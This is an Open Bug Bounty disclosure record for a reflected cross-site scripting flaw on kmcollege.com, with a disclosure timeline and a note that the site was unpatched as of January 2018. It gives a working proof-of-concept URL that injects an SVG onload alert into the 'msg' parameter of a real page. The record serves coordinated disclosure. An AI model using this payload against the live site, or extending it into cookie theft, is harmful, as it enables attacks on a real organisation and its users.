kmcollege.com XSS vulnerability

2017-10-13T01:51:00
ID OBB:336710
Type openbugbounty
Reporter SonnySpooks
Modified 2018-01-11T02:21:00

Description

Vulnerable URL:
http://www.kmcollege.com/viewgallery4.jsp?&topic;=I.A.%20NOTICE&pby;=admin&msg;=%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3EThe%20Internal%20Assessment%20marks%20of%20students%20have%20been%20displayed%20on%20the%20College%20notice%20board.%20Students%20are%20requested%20to%20check%20their%20details%20and%20in%20cases%20of%20discrepancies,%20contact%20Mr.%20Sanjeet%20Kumar%20Singh%20in%20the%20Central%20Computer%20Lab%20so%20that%20his/her%20objection%20can%20be%20sent%20to%20the%20Internal%20Assessment%20Committee%20of%20the%20College%20for%20necessary%20action%20latest%20by%20May%2017,%202012.%20No%20complaint%20will%20be%20entertained%20after%20the%20aforesaid%20date.&image1;=&image2;=&image3;=&image4;=&image5;=&image6;=&image7;=&image8;=&image9;=&image10;=&ATT;=1127110520121755131.A.%20NOTICE.pdf
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 11.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 19341878
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 October, 2017 01:51 GMT
Generic security notifications sent to website owner| 13 October, 2017 01:54 GMT
Notification sent to subscribers (without technical details)| 13 October, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 11 January, 2018 02:21 GMT